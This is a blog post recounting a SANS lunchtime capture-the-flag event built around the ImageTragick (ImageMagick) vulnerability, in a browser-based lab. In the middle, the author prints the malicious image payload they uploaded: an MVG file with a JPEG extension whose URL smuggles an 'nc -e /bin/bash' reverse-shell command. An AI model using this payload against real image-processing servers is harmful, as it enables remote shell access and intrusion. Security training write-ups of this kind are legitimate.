A colleague of mine who is very involved with SANS sent me an invitation for a new event last week called ‘One-Hour Ctf’. The event was, hosted by Ed Skoudis and the team that puts together the SANS NetWars and Holiday Hack Challenge, was invite-only and capped at 100 people so I felt special. The premise of the idea is simple, once per quarter the team will hold a lunchtime CTF event that starts out with a discussion of a relevant topic, then turns the participants loose for 40 minutes to capture 1 or more flags, ending with a discussion of the solution and notification of the winners.
The first event dealt with the recent imagemagick exploit(s) (http://imagetragick.com/). The presenters did a great quick walk-through of the vulnerability and provided some slides with additional info. One of the best parts of this event was that you do not need to spin up a VM and can participate from any PC that has a web browser. Once logged in to the site, each participant is given their own Docker image based on Avocado with console access to an attacking machine as well as browser access to the target web application.
The challenge consisted of uploading a malicious image file, catching a shell and reading out a flag. To grab a reverse shell I uploaded a file with a jpeg extension containing the following:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://blah.com/blah.png";nc -e /bin/bash 8080")'
pop graphic-context
I fired up a netcat listener and uploaded the image. Since there were so many people uploading at the same time it took a while but I eventually got a shell back and the first flag. There was a second flag which utilized another portion of the imagemagick vulnerability chained together with a misconfiguration. While I did end up obtaining both flags, I will not post the solution for the second as the organizers did not discuss it.
Overall I thoroughly enjoyed the event and thought the organizers/presenters pulled it off flawlessly during the one hour time frame, which is quite a feat (especially for a beta run).
The final scoreboard:
